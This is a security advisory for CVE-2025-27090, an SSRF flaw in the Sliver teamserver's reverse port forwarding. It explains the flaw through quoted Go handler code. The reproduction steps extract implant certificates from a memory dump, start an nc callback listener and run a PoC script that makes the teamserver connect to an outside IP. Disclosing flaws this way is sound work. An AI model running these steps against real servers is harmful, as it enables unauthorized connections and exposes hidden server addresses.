CVE-2025-27090 – github.com/bishopfox/sliver
Package
Manager: go
Name: github.com/bishopfox/sliver
Vulnerable Version: >=1.5.26 <1.5.43
Severity
Level: Medium
CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:L/E:U/RL:O/RC:C
CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N
EPSS: 0.00185 pctl0.40489
Details
SSRF in sliver teamserver ### Summary The reverse port forwarding in sliver teamserver allows the implant to open a reverse tunnel on the sliver teamserver without verifying if the operator instructed the implant to do so ### Reproduction steps Run server ``` wget https://github.com/BishopFox/sliver/releases/download/v1.5.42/sliver-server_linux chmod +x sliver-server_linux ./sliver-server_linux ``` Generate binary ``` generate --mtls 127.0.0.1:8443 ``` Run it on windows, then `Task manager -> find process -> Create memory dump file` Install RogueSliver and get the certs ``` git clone https://github.com/ACE-Responder/RogueSliver.git pip3 install -r requirements.txt --break-system-packages python3 ExtractCerts.py implant.dmp ``` Start callback listener. Teamserver will connect when POC is run and send "ssrf poc" to nc ``` nc -nvlp 1111 ``` Run the poc (pasted at bottom of this file) ``` python3 poc.py <SLIVER IP> <MTLS PORT> <CALLBACK IP> <CALLBACK PORT> python3 poc.py 192.168.1.33 8443 44.221.186.72 1111 ``` ### Details We see here an envelope is read from the connection and if the envelope.Type matches a handler the handler will be executed ```go func handleSliverConnection(conn net.Conn) { mtlsLog.Infof("Accepted incoming connection: %s", conn.RemoteAddr()) implantConn := core.NewImplantConnection(consts.MtlsStr, conn.RemoteAddr().String()) defer func() { mtlsLog.Debugf("mtls connection closing") conn.Close() implantConn.Cleanup() }() done := make(chan bool) go func() { defer func() { done <- true }() handlers := serverHandlers.GetHandlers() for { envelope, err := socketReadEnvelope(conn) if err != nil { mtlsLog.Errorf("Socket read error %v", err) return } implantConn.UpdateLastMessage() if envelope.ID != 0 { implantConn.RespMutex.RLock() if resp, ok := implantConn.Resp[envelope.ID]; ok { resp <- envelope // Could deadlock, maybe want to investigate better solutions } implantConn.RespMutex.RUnlock() } else if handler, ok := handlers[envelope.Type]; ok { mtlsLog.Debugf("Received new mtls message type %d, data: %s", envelope.Type, envelope.Data) go func() { respEnvelope := handler(implantConn, envelope.Data) if respEnvelope != nil { implantConn.Send <- respEnvelope } }() } } }() Loop: for { select { case envelope := <-implantConn.Send: err := socketWriteEnvelope(conn, envelope) if err != nil { mtlsLog.Errorf("Socket write failed %v", err) break Loop } case <-done: break Loop } } mtlsLog.Debugf("Closing implant connection %s", implantConn.ID) } ``` The available handlers: ```go func GetHandlers() map[uint32]ServerHandler { return map[uint32]ServerHandler{ // Sessions sliverpb.MsgRegister: registerSessionHandler, sliverpb.MsgTunnelData: tunnelDataHandler, sliverpb.MsgTunnelClose: tunnelCloseHandler, sliverpb.MsgPing: pingHandler, sliverpb.MsgSocksData: socksDataHandler, // Beacons sliverpb.MsgBeaconRegister: beaconRegisterHandler, sliverpb.MsgBeaconTasks: beaconTasksHandler, // Pivots sliverpb.MsgPivotPeerEnvelope: pivotPeerEnvelopeHandler, sliverpb.MsgPivotPeerFailure: pivotPeerFailureHandler, } } ``` If we send an envelope with the envelope.Type equaling MsgTunnelData, we will enter the `tunnelDataHandler` function ```go // The handler mutex prevents a send on a closed channel, without it // two handlers calls may race when a tunnel is quickly created and closed. func tunnelDataHandler(implantConn *core.ImplantConnection, data []byte) *sliverpb.Envelope { session := core.Sessions.FromImplantConnection(implantConn) if session == nil { sessionHandlerLog.Warnf("Received tunnel data from unknown session: %v", implantConn) return nil } tunnelHandlerMutex.Lock() defer tunnelHandlerMutex.Unlock() tunnelData := &sliverpb.TunnelData{} proto.Unmarshal(data, tunnelData) sessionHandlerLog.Debugf("[DATA] Sequence on tunnel %d, %d, data: %s", tunnelData.TunnelID, tunnelData.Sequence, tunnelData.Data) rtunnel := rtunnels.GetRTunnel(tunnelData.TunnelID) if rtunnel != nil && session.ID == rtunnel.SessionID { RTunnelDataHandler(tunnelData, rtunnel, implantConn) } else if rtunnel != nil && session.ID != rtunnel.SessionID { sessionHandlerLog.Warnf("Warning: Session %s attempted to send data on reverse tunnel it did not own", session.ID) } else if rtunnel == nil && tunnelData.CreateReverse == true { createReverseTunnelHandler(implantConn, data) //RTunnelDataHandler(tunnelData, rtunnel, implantConn) } else { tunnel := core.Tunnels.Get(tunnelData.TunnelID) if tunnel != nil { if session.ID == tunnel.SessionID { tunnel.SendDataFromImplant(tunnelData) } else { sessionHandlerLog.Warnf("Warning: Session %s attempted to send data on tunnel it did not own", session.ID) } } else { sessionHandlerLog.Warnf("Data sent on nil tunnel %d", tunnelData.TunnelID) } } return nil } ``` The `createReverseTunnelHandler` reads the envelope, creating a socket for `req.Rportfwd.Host` and `req.Rportfwd.Port`. It will write `recv.Data` to it ```go func createReverseTunnelHandler(implantConn *core.ImplantConnection, data []byte) *sliverpb.Envelope { session := core.Sessions.FromImplantConnection(implantConn) req := &sliverpb.TunnelData{} proto.Unmarshal(data, req) var defaultDialer = new(net.Dialer) remoteAddress := fmt.Sprintf("%s:%d", req.Rportfwd.Host, req.Rportfwd.Port) ctx, cancelContext := context.WithCancel(context.Background()) dst, err := defaultDialer.DialContext(ctx, "tcp", remoteAddress) //dst, err := net.Dial("tcp", remoteAddress) if err != nil { tunnelClose, _ := proto.Marshal(&sliverpb.TunnelData{ Closed: true, TunnelID: req.TunnelID, }) implantConn.Send <- &sliverpb.Envelope{ Type: sliverpb.MsgTunnelClose, Data: tunnelClose, } cancelContext() return nil } if conn, ok := dst.(*net.TCPConn); ok { // {{if .Config.Debug}} //log.Printf("[portfwd] Configuring keep alive") // {{end}} conn.SetKeepAlive(true) // TODO: Make KeepAlive configurable conn.SetKeepAlivePeriod(1000 * time.Second) } tunnel := rtunnels.NewRTunnel(req.TunnelID, session.ID, dst, dst) rtunnels.AddRTunnel(tunnel) cleanup := func(reason error) { // {{if .Config.Debug}} sessionHandlerLog.Infof("[portfwd] Closing tunnel %d (%s)", tunnel.ID, reason) // {{end}} tunnel := rtunnels.GetRTunnel(tunnel.ID) rtunnels.RemoveRTunnel(tunnel.ID) dst.Close() cancelContext() } go func() { tWriter := tunnelWriter{ tun: tunnel, conn: implantConn, } // portfwd only uses one reader, hence the tunnel.Readers[0] n, err := io.Copy(tWriter, tunnel.Readers[0]) _ = n // avoid not used compiler error if debug mode is disabled // {{if .Config.Debug}} sessionHandlerLog.Infof("[tunnel] Tunnel done, wrote %v bytes", n) // {{end}} cleanup(err) }() tunnelDataCache.Add(tunnel.ID, req.Sequence, req) // NOTE: The read/write semantics can be a little mind boggling, just remember we're reading // from the server and writing to the tunnel's reader (e.g. stdout), so that's why ReadSequence // is used here whereas WriteSequence is used for data written back to the server // Go through cache and write all sequential data to the reader for recv, ok := tunnelDataCache.Get(tunnel.ID, tunnel.ReadSequence()); ok; recv, ok = tunnelDataCache.Get(tunnel.ID, tunnel.ReadSequence()) { // {{if .Config.Debug}} //sessionHandlerLog.Infof("[tunnel] Write %d bytes to tunnel %d (read seq: %d)", len(recv.Data), recv.TunnelID, recv.Sequence) // {{end}} tunnel.Writer.Write(recv.Data) // Delete the entry we just wrote from the cache tunnelDataCache.DeleteSeq(tunnel.ID, tunnel.ReadSequence()) tunnel.IncReadSequence() // Increment sequence counter // {{if .Config.Debug}} //sessionHandlerLog.Infof("[message just received] %v", tunnelData) // {{end}} } //If cache is building up it probably means a msg was lost and the server is currently hung waiting for it. //Send a Resend packet to have the msg resent from the cache if tunnelDataCache.Len(tunnel.ID) > 3 { data, err := proto.Marshal(&sliverpb.TunnelData{ Sequence: tunnel.WriteSequence(), // The tunnel write sequence Ack: tunnel.ReadSequence(), Resend: true, TunnelID: tunnel.ID, Data: []byte{}, }) if err != nil { // {{if .Config.Debug}} //sessionHandlerLog.Infof("[shell] Failed to marshal protobuf %s", err) // {{end}} } else { // {{if .Config.Debug}} //sessionHandlerLog.Infof("[tunnel] Requesting resend of tunnelData seq: %d", tunnel.ReadSequence()) // {{end}} implantConn.RequestResend(data) } } return nil } ``` ### Impact For current POC, mostly just leaking teamserver origin IP behind redirectors. I am 99% sure you can get full read SSRF but POC is blind
Metadata
Created: 2025-02-19T21:11:33Z
Modified: 2025-02-20T22:47:01Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/02/GHSA-fh4v-v779-4g2w/GHSA-fh4v-v779-4g2w.json
CWE IDs: ["CWE-918"]
Alternative ID: GHSA-fh4v-v779-4g2w
Finding: F100
Auto approve: 1